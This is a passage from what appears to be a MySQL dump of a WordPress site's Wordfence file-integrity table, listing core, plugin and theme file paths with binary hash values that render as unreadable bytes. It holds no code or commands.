P\0\\�D','kr\r���.d����y%@IX���t+��Z��','',0,'?'),('���W���=�ԘHd�z','wp-includes/class-wp-site-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Wy�\ng�MP��)�p1','���C�ƙ&���v����\"�[�SK@�	��Π@','',0,'?'),('��X����-�4�J�_�3','wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!~��-i���1','P�\0�\r/��;I�\n2\'��\'�v8����%q�Dl','',0,'?'),('����\'>�[��·�','wp-admin/js/user-profile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;T\n-rh��X��	vs','K6�r4���#�wM�7f�\r����G�\\s#','',0,'?'),('��a\'�0�E�\n�j��','wp-content/plugins/wp-cerber/assets/flags/az.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dj�CO#M�P4`jz�G','=K���LJ���v͎��\ZG詋�3��z�6','',0,'?'),('���Pd������c�3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����s�?�K��1\"','�Ĩ:E��kE��N�k\rFO>\"gvP��\"@��','',0,'?'),('�O�X�g]<f@�','wp-admin/css/farbtastic-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S@��[�\\,�3|��!','�Sm�\'�;d`��e�M�0i=�?>����?{','',0,'?'),('�3��Ƈe�(ú9�','wp-includes/js/jquery/suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('��b����N�8�hk�','wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cW�U��ԟ�`B	','w�\r��j�*�m�l]� �t��PU�\r�E��','',0,'?'),('��\\�(��wB��I�','wp-admin/network/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��	ΒRU;�pp�b�','��,�!��m4f������NR�\n���B��^','',0,'?'),('�$�+K71�y(�F���','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��^gm�d\r9x0�','8�x+&�9�;x�L&�����M!%�C=Y�,M�f','',0,'?'),('�(tTlDά7&��MP.�','wp-includes/js/tinymce/tiny_mce_popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B7�I1�0�����d�','���\'З��/!\Z�a!�~�)��1D��','',0,'?'),('�/	�E:K�R寥�v�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��[�SPk�C�','��ںم�Ŵ��}C:�ø=�~��Q�(8��$Q','',0,'?'),('�@�F �Ӡ(���e*[','wp-admin/js/theme-plugin-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 9��\'�74J;��~=Z�','� mُ���tz�fD��d��9�7�T��','',0,'?'),('�B��ه�v<Sv稳','wp-includes/SimplePie/Parse/Date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\�O2�����C[\nջ','�=��<��ei|�M�qZ]V[]&I-q9)g�0','',0,'?'),('�F� �GJ��B��s7�','wp-includes/js/media-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӷsj�~�MP����+','���7��}Z��9��ڜ<r���kV~��','',0,'?'),('�W= \\\'x\"�W��}��d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���թ�K���^㥾�','�M�8:�naƋGZ�qQdý!����\'��&g1','',0,'?'),('�_&�����H���g�','wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uׂ-%�?�\'���tJ��','���B��]��>LZo�#Q�^V�x���#�','',0,'?'),('�p�x��\\?;�hE/��','wp-content/themes/twentytwentyone/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����1��[�','�y)�9�������S�[f<�\0���+{�$/�','',0,'?'),('�w��5���)���','wp-includes/css/wp-embed-template-ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)6��	؞мq ���','�o��+8]�Su�H.�C�g��R9�&�+���\\W�','',0,'?'),('��\0���+OW+�','index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�]�#��N�X�,�','�Dz�\n�}_��7x,�9�t:��\'�\r����','',0,'?'),('�����A���1\Z�;�','wp-includes/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4|����e��(r',':��.,�0aH�A��\05:�f�s\nf������','',0,'?'),('���]�5�K���^\r�','wp-content/plugins/wp-cerber/admin/cerber-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��b;��Vs��5���','�#z\05�ӊ;��:�b��	VJ�X>8��Nk','',0,'?'),('���nM\02]\r^�r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/\n�Bt�;','VYj8�b��5�f�c]�7W�iƘ2H�N}�2�^','',0,'?'),('���v�A\nGr�3C9`','wp-admin/includes/class-wp-internal-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^I[8T䍍�\\��=','Y^9�A\r+^-��iL�W��j��O���F��','',0,'?'),('�\Z�R虒�<Fc֛;�','wp-content/plugins/wp-cerber/assets/flags/mp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4^�>!i��2D�h�','�k\"�z�ƽ��A��i�s\"A�ǽ��(\Z9','',0,'?'),('�3X�/�����\'��P','wp-content/themes/twentytwentyone/inc/starter-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���ڧ�)E(\Z�U','E���1&�km��{�����\0Ғt�nɿ�HV','',0,'?'),('�<�¥���� ����\0','wp-content/themes/magazine-hoot/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�kkR/-V���8','[}�7�H��6c���}�49���U�67��k�3�','',0,'?'),('�Ebl8�y���}����','wp-includes/js/tinymce/plugins/link/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('�m>�\0��0X&�^�Q','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pKz��`�)9_@�','��aғYe�q�7YTc�Ȋi$�W�ت�/�!�,','',0,'?'),('��Ǔ��肴����l','wp-content/themes/twentytwenty/assets/js/editor-script-block.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�Q~�.Yf�1:D',':馈���x�t[cJ��=�\Z�\Z���h��0','',0,'?'),('��?���z6���aDz','wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('���ʆ��n�D㮖�(','wp-admin/css/install.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�],�:��f��3','�(��Ty��0-��#�FOs�;�=��K�o�','',0,'?'),('��j����5��f�j�','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��L|�y+5*�M\0Qk','�����O�q��Fri���e�+�K�	�/;C','',0,'?'),('���H�C�|��Z','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z����9Y�:!�','[\\�VH�e�N���,��`����/\'�-vD','',0,'?'),('�)ũ��2[�	�4�_a','wp-includes/class-walker-category-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��s�ny�ld�)��','�ՠ���P)_�s�)v]��Չ\"����|�','',0,'?'),('�+o�2��8�E�+K%;�','wp-includes/PHPMailer/PHPMailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�in=��2�����:G','����r����p�NX����7�����?H�RG��','',0,'?'),('�:+[��g��CZ���','wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�	ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�H�F���I!���M9','wp-content/plugins/wp-cerber/assets/crb-logo-vn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��h��%t�J���','�Q��6�������V���\0\r��M�9��','',0,'?'),('�i2O�׍��+�s�X.�','wp-includes/js/jquery/ui/core.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PC��\r�{�tk�\"x',' �S�����3~�n�F#�EHf�_��7qY@I��','',0,'?'),('���P���M�˝�=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','raX\'��z\05+�\"�7','v�$�r�_s�y�Y���U{ؘ?��C','',0,'?'),('���e��-\n�yV','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�Ww�b>E��yJ','�\'�����~�6ȝ\nB���agz���d��Q','',0,'?'),('������PU��ac��','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YA��G=b�u���','z�,ͥ���t	<{@Y{�iy��s���c�(S�L','',0,'?'),('��nv��Z�YV��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bvA�n�a��1 C��','�g�����z��߶u��p{��!v|�*^��3	�G','',0,'?'),('��H�#��ým|�e','wp-includes/pomo/pomo/streams.php',0,'�����p�5yN.��&','�����p�5yN.��&','�Ό��!-�ʉ�^;�#��Ut�\n�W^���YG5','',0,'?'),('�Z��D��l�=�컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�Oq�W����','a\"��μ�s�f��Ѳ>Zbk�xֲ|<�A','',0,'?'),('�	3AYo!u����o-','wp-content/themes/magazine-hoot/hybrid/inc/template-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O`�Jϼ�R@��Rs�','$����v*<���f�l�8D���\\y2','',0,'?'),('�!\"ro�ɿ��M�8�','wp-content/themes/twentynineteen/inc/icon-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�:L���o#5]Z�',')��D��7��^�ޞ��>���?}���4u����','',0,'?'),('�-\r�bsM�u��И','wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/2_preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9OEL1��O-�<$��8+','tc�a�O���(*R����w�q�9�+F.P�m�&','',0,'?'),('�1�`��B���¡]�s','wp-includes/css/dist/editor/editor-styles.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/Ow�:#��v���\r',']��Ɇ���m�{�w��#ߟ^��,n����,>','',0,'?'),('�B%v6�I\"Jb��4ӡT','wp-admin/link-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�0iNj�����','�Lo(��m�ؾT���k�%<P!w�/\n�','',0,'?'),('�BK�@�~&�^��8','wp-content/themes/twentynineteen/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t����\\�K����','�{��\Z\0�`OT�{>\0����½���	L>L�','',0,'?'),('��>�A�B�7�Sz!�e','wp-admin/includes/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8:Y�Ǐ#��;Y','�g?�.�a��q�B�ٟE�F������o��|�','',0,'?'),('��|0���O�+�]lU�','wp-includes/js/dist/a11y.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','婯�S\Z�`�!`TLu','ʢ����Α%��d5F�(�VW��1�V|\"u99','',0,'?'),('���T�양�:t[��','wp-includes/Requests/Exception/HTTP/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�O47ߺݥ/8X!��','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),('�65\nN���x/\0���','wp-content/plugins/wp-cerber/assets/flags/mo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����aM7-�VD��%�','��K����v�FI���ۨ�0g��h�HV�R','',0,'?'),('�)����Yh�.�;��š','wp-includes/Requests/Exception/HTTP/412.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��Iܷ��=�7��V�','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('�1�eU��MV��^��','wp-admin/includes/misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��銻~F�a8U�\'v','��j{y˔���5N�1��ޝ���2콲��','',0,'?'),('�F_q���C�F!o4p��','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��|#n��\0Y���','\\,���5�^�[A��:p��	�F���R��','',0,'?'),('�N6?`$�Qil�L','wp-content/plugins/wp-cerber/assets/flags/pe.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:���Z�d�D�\'y�1','8����,0��M߀�����҃��WO1q�','',0,'?'),('�P�4ՓQ�)zS���','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M���G�ᆻ��$','*+���\0%G�;�_dE}u�-��4w�\"�','',0,'?'),('�SK�8kf�k��X�ҍ\\','wp-content/plugins/wp-cerber/assets/flags/ke.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��K�PS���P�X','�_��/�6�pp����	6�4�zI\0ֱ�Éf','',0,'?'),('��\0�>#����z(','wp-includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7!ć>pP�:�ޑ\r','6̎2M̥���?��&rA���bĪ�ux^с','',0,'?'),('���������}��','wp-admin/media-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�f���/�Pe��','�v��H1G�t�+�l�O\r�>��qc���m\\�iS','',0,'?'),('���P�w���0�h�9','wp-includes/js/tinymce/plugins/fullscreen/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�;j��|�:1/��','wp-admin/site-health-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#uy�d>�ٲ�(H�(','o\'U����~ߡ�e�g�|�(��ې�3,�$','',0,'?'),('�=�IU��c�O�G�','wp-content/plugins/wp-cerber/assets/flags/fo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jX�?c0<G�Ia~�','��lNw�ʭ�!X�uw���_9{-]L��/ܐ','',0,'?'),('�B y�w�+���|t��','wp-includes/class-wp-http-requests-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('�J�&_#��3S�q���','wp-admin/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6�����	B��4�6','',0,'?'),('�V+@�0���p�ɏhi','wp-includes/rest-api/class-wp-rest-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('�Z���)_��w�\'$�X�','wp-includes/class-wp-block-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�}�C�1gGr*� �7','&t�]�Y`�쿨�9}���܇W���-','',0,'?'),('�^Sx_?u�G�D���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�d9<C�ˤ���bl','K�.Bo����ࣸ�v��b�%����S~1�K��','',0,'?'),('�b~5�a���I@)*�','wp-includes/class-wp-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eo��C�I�7#�\n��','-�h���ʠ^�F�0?�0\n�%s�ibV\\�X�','',0,'?'),('�fG<�@៝N���-','wp-admin/includes/class-wp-privacy-requests-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z|���f����?','z�\\��?��+i.��x�7�j���.i����','',0,'?'),('�x9p�2���w���B','wp-includes/ms-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('��-�y��[�(�<�%C','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-admin-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�!hQk�ө��Q���`',';�ǐs𙸡��:��;Mȴ�N�x�Cd/��+�','',0,'?'),('��j���\'���r��y','wp-content/themes/magazine-hoot/include/admin/images/archive-mosaic2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+%�|U ����MA','��+k7\n�ơ\r��o�(St?����f�@��','',0,'?'),('��\\:��ڈ��)g,\\','wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('���a&�=g8�Օ`iG','wp-content/themes/magazine-hoot/js/jquery.superfish.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?k3���7B���:/��','���0����\0��2,k�+�?^Or��~v��#','',0,'?'),('��e��-osŕ;�/�','wp-content/themes/twentynineteen/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z]/��\'\'~�z�].Z[','�/} ���	��ԾA9{�!���w���a��.','',0,'?'),('��!��E��S7�x����','wp-content/wflogs/rules.php',0,'�(1\r���\"]��4���','�(1\r���\"]��4���','PM�瀺7�;��j�{��9�p����Q-	s�:a','',0,'?'),('������>2\\o�)���','wp-includes/Requests/Exception/HTTP/Unknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dl᫁�2�A��\nW�','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('���3v�U�\Z3�P�^O ','wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2՝�NI 3:_(��','$�C��s���,����ɍ��2�3-��Q�a','',0,'?'),('��o4}+��8��O�','wp-content/plugins/wp-cerber/assets/flags/nc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!5�A/g��4�S�H','�.)Po�\\r�d�	!NZ�Ӆ�8��8E��','',0,'?'),('��L �U���f��u�<','wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�P*���{>v��Uf','����?U��z��P\\��@�`�8g;\r����E','',0,'?'),('���o�w���Ў�696I','wp-includes/random_compat/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('��[B�^��	Z�1�','wp-content/themes/twentynineteen/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v\nqYĸ`p����','�?Zt-�(D��~���$mͼ�wj�x$\n�^E�','',0,'?'),('�Çz_��H��m��','wp-content/themes/magazine-hoot/hybrid/customize/control-select-group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D֙���z^�o�t`�','��btpvA����z�>$�T�ykb\'ը����t','',0,'?'),('���Iy-�\n�ń��','wp-includes/Requests/Exception/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6T�g*\Z�:	�x7��','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('�(�2�I(���I�B[�','wp-content/themes/magazine-hoot/include/admin/customizer-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��ʉ3ud��@��','׻�S�]a�ē�_)Ӳ<�΀\0��޴�\\7T=��','',0,'?'),('�:=�%����M�۵','wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��f?Yk�EЉ��+V','a�+)	�h=���%d�D�\Z/��BA��j\\�n','',0,'?'),('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)�	>','',0,'?'),('�U�7v��������\n','wp-content/plugins/wp-cerber/assets/multi/multi.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���ݕD��E��','�W>)p†M��!��=�V#qu&,N�����+��','',0,'?'),('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ե3<�Y5Ω8�z��;','�I&A ��k9H��xjW�;��JL�fS]z','',0,'?'),('���eM�y*Ҟ����','wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kc�����\0z�[>�\rY','��J�x\r]�|��-��u+ߏ�$�a��','',0,'?'),('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��MQ�@��Ǯ���I','����~�r�b�wTN�s��;3f��B���)A','',0,'?'),('���t�V��<��C��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`��׳m�%�','�(��l]�h��Юa	y�fh��0v\'u�vm�','',0,'?'),('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����� v��d','W�Y�0����2w��	5�O���zm� ���^','',0,'?'),('��w��i.�w�(M;0D','wp-content/plugins/akismet/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��|���2-�#�','�J�S�\\<�Cޏ�=s\'WI&\Z�(���vaTo','',0,'?'),('��!?M�\"Q��e>��','wp-content/plugins/wp-cerber/assets/nexus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"����tw�L�','clY`��-�]N�U��~���uA1W�R�j�XR�','',0,'?'),('���ws� ��+���C\'','wp-content/themes/twentytwenty/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�l���Ѽ	&.���','�_7�����\\�7�Hms��.:[)��dM�','',0,'?'),('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q͊����tF����','�,��Ca�� NÉ���vK�hWIQ�xk|�Q','',0,'?'),('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��t{0o�ޖ','7<NoQF���\0�$�j�aϤ m���\r�i��','',0,'?'),('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('�X*����VL	�_�','wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0}3�*�?�v�+,\"','&tT=����ȼitg`^�5����2G��Vcg<','',0,'?'),('�j��I���<꟟��iU','wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K������g�m�=5','S����.�k��Sgn8 �����H\"�','',0,'?'),('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),('��2u�\"<g�@�f�%','wp-content/plugins/wp-cerber/assets/flags/ki.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K���ȶ�','�\"�&9ʈ��7�lZ��P�퇢 �j�/','',0,'?'),('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`_?ބ=�|���+�d�','���M���S����>j/���\"K%qޣ��~','',0,'?'),('��e�\\��1�tƋ�<	�','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&?C]�\\��g~�J;<:','3�*4��Sxg��\r�\Z\n�1?�N#?�a]��p','',0,'?'),('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j����	Q�l�*,�I�','�� w6R�(�K�T%ni�1��0�����[r','',0,'?'),('���K�ȁ;$��z�','wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m����5��F2�c�:į','�d��P��\'���Z8������ϭd�%9���AN','',0,'?'),('�HR3}��Zc�d�i','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�Q��$��� �o|C\\','�cS�؀/�8-(&�1H�4�����L�','',0,'?'),('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�d��RĆC�P���b&','wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\rW�����Н','%��?�\Z�v�bq]��g�5Z)u�Ѷ\Z�o�\'�0','',0,'?'),('�kIK����V[��	5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s	�15�','',0,'?'),('�w�\Z�d�Ϣ�\ruD\"','wp-includes/IXR/class-IXR-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�xm�5��o�-]�Ž��','wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��x�_r�Z�','�6�� 